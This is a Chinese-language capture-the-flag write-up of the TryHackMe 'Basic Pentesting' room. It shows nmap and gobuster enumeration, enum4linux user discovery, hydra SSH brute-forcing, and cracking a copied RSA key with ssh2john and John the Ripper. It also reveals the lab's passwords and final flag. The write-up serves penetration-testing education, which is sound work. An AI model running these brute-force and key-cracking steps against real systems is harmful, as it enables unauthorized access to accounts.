[Thm红队]靶场之渗透测试web枚举和哈希破解Rsa-SSH进阶版

前言

在此房间中，我们将学到以下内容：

• 暴力破解 
• 哈希破解 
• 服务枚举
• Linux枚举

房间地址https://tryhackme.com/room/basicpentestingjt

此次学习的内容都是真正实战能使用到的内容

在此是我发布的第三个房间,而且发布的内容都是一层一层递进的,如果这里面有内容您看不懂建议您先去看我发布的前两个房间文章,我已为大家整理出来

实战

本次靶机10.10.80.1

先ping一下

可以看到他是存活的

namp开扫！

解释一下：

1. nmap: 这是命令行工具的名称，用于网络扫描和网络探测。
2. -A: 这个参数是启用了操作系统检测、版本检测和应用检测。这会使得 nmap 尝试推断目标主机上运行的操作系统、服务版本以及可能的应用。
3. -sC: 这个参数表示使用 “script scan”，即执行 nmap 内置的脚本进行扫描。这些脚本主要用于发现常见的安全漏洞。
4. -sV: 这个参数表示进行服务版本检测。当 nmap 扫描到一个开放的端口时，它会尝试确定在该端口上运行的服务版本。这对于了解目标主机的安全配置和已知的安全漏洞非常有用。
5. -oN /root/nmap/1.txt: 这个参数表示将扫描结果输出到名为 “/root/nmap/1.txt” 的文件中，而不是输出到终端。这样你可以在之后查看或分析这个文件。
6. 10.10.80.1: 这是你想要扫描的目标主机的 IP 地址。

 nmap -A -sC -sV -oN /root/nmap/1.txt 10.10.80.1

看一下扫描结果兄弟们

可以清楚看到

开放了80和22端口以及139和445端口

访问80端口看看

啥也没有,很好(其实是好个蛋)

查看源代码：

我想不必翻译了吧，,

那就进去dev目录看看

阿帕奇中的乌班图

查看一下kali自带的字典

我们将要使用的是：directory-list-2.3-medium.txt

目录扫描

所以我们将要用gobu扫描一下：

命令：

gobuster dir -u http://10.10.80.1/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

让他慢慢扫

扫到百分之一的时候扫出来了好东西 /development目录

先访问看一下

有两个txt文件

访问看一下：

用翻译翻译一下：

访问J.txt在看一下：

这与我们在 nmap 扫描中看到的情况相对应，其中 Apache 版本和 SMB 可用。在j.txt中看到到这些信息，我们就知道在暴力破解中，J & K 需要寻找什么。所以需要枚举出J&K的具体用户

enum4linux枚举

我们将使用工具（enum4linux）对 SAMBA 服务进行枚举（请耐心等待几分钟）

enum4linux -a 10.10.80.1

枚举出 kay和jan两个用户

用九头蛇破解jan的ssh密码（上个房间有介绍九头蛇）

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.80.1 ssh

拿到密码armando

登录

ssh jan@10.10.80.1

看一下目录

root拿不到 拿那kay的东西吧

结果kay自己的东西也拿不到

但是我们发现pass.bak 以及.ssh 这两个都非常敏感

我们cat 一下pass.bak发现我们并没有权限

cd .ssh 目录看看

ls -a看看 看到有个rsa文件

cat id_rsa 看到一串私钥（web的ssl就是基于rsa加密）

另外我们也能看见加密方式AES-128-CBC

国外大佬提权脚本：https://github.com/carlospolop/PEASS-ng

再此处您有两个选择：一个是对j提权 用到国外大佬提权脚本

另一个就是对k进行rsa破解

域对提权了解甚少所以本次我们用John the rippe对其rsa破解

首先我们必须找到 ssh2john.py 来转换哈希值，并将“id_rsa”文件内容作为文本文件复制并保存到我们的计算机中，我们必须将文本文件转换为哈希格式

python /usr/share/john/ssh2john.py id > id_rsa.hash

此时此刻桌面出现了hash文件,把rsa的所有内容拖进去

开始破解

sudo john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt 

这边说AES256CBC破解 具体我也不清楚是哪里不行昨晚干到凌晨三点没破解出来（其实破解速度还是不慢的）

原因：因为保存的是hash文件而不是txt文件所以导致失败.即没有成功转化格式 此时此刻我有点累了准备白天再战

靶场过期了我们将靶场更换成10.10.135.156

下面用脚本对j进行提权尝试：

https://github.com/carlospolop/PEASS-ng 还是这个链接 下载这个压缩包

复制到kali上进行解压

请确保没有下错：

将副本解压到kali的文件夹中

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh打开这个链接下载脚本

下载完后在win上复制到kali的项目文件中

cd /你的项目文件中

复制下面命令使脚本可执行。

chmod +x linpeas.sh

运行脚本

/opt/jiaoben/linpeas.sh

这次只是本地运行一下 但实际上我们的脚本文件需要传传到服务器上运行

使用：

scp /opt/jiaoben/linpeas.sh jan@10.10.135.156:/home

意思是我们把linpeas.sh写进home目录 如果写进去我们本来想继续运行的

但是我们会发现

他nnd根本没有权限

所以使用脚本的步骤我们可以直接跳过（当然我也建议去下载实操一下 毕竟我们以后要用）

所以我们还是回到我们的爆破当中

好的我们重新来一遍

SSH密码破解

在桌面打开终端

nano kay_rsa

这个意思是以nano模式打开一个文件

把我们的rsa复制进去

ctrl+O保存 退出

让rsa只读

chmod 600 kay_rsa

这个是个私钥我们做网站的都知道有私钥是可以免密登录的

尝试免密登录

ssh -i kay_rsa kay@10.10.135.156

发现不对劲打开rsa文件一看

还是免不了爆破

为了使用开膛手约翰我们还是需要转换一下格式(转换后要是txt文件)

python /usr/share/john/ssh2john.py kay_rsa > forshen.txt

运行之后会在桌面形成一个forshen.txt文件

sudo john forshen.txt -wordlist=/usr/share/wordlists/rockyou.txt 

进行爆破这下很快就出来了

密码是beeswax

刚靶机过期了 把靶机又换成10.10.79.157不过这不是重点

我们这下就可以ssh登录了

ssh -i kay_rsa kay@10.10.79.157

cat pass.bak

flag：heresareallystrongpasswordthatfollowsthepasswordpolicy$$

尾部：

此次借鉴了Youtube博主John Hammond的教学

https://www.youtube.com/watch?v=xl2Xx5YOKcI

------本文已结束，感谢您的阅读------